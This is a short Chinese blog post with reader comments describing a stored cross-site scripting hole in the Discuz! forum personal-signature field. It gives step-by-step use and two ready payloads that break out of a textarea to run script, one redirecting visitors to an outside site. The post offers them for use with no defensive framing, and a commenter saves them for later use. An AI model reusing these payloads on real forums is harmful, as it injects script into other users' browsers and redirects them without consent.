最新Discuz!跨站个人签名漏洞

最新Discuz!跨站个人签名漏洞

由于DZ论坛的对个性能签名字符过虑不严导致XSS跨站角本可以执行

随便选个 Discuz! 论坛我们注册一个用户!

并输入跨站脚本代码 , 以我们个人的签名

</textarea><script>alert(/瑶哥博客/);</script><textarea> 

也可以写成这样:</textarea><script>alert(/欢迎访问/);location.href=/http://yaoge.me/;</script><textarea>

已有 9 条评论
  1. crll

    XSS跨站。。。。

    crll 回复
  2. N倍高

    呵呵谢谢博主

    N倍高 回复
    1. 瑶哥

      @N倍高

      官方也有提到些漏洞,只是没有官方人员出来说明并修复

      瑶哥 回复
  3. 制砂机

    至今不知道签名到底咋回事,好像很重要,没人教过

    制砂机 回复
    1. 瑶哥

      @制砂机

      有人为了个性,有人为了宣传

      瑶哥 回复
  4. freemouse

    额,收藏了,可能会用上

    freemouse 回复
    1. 瑶哥

      @freemouse

      利用价值不大,在帖子页面没有反应,要在个人资料页面才有反应!

      瑶哥 回复
  5. 签名

    果断沙发 呵呵

    签名 回复
    1. 瑶哥

      @签名

      谢谢来访!@

      瑶哥 回复
发表新评论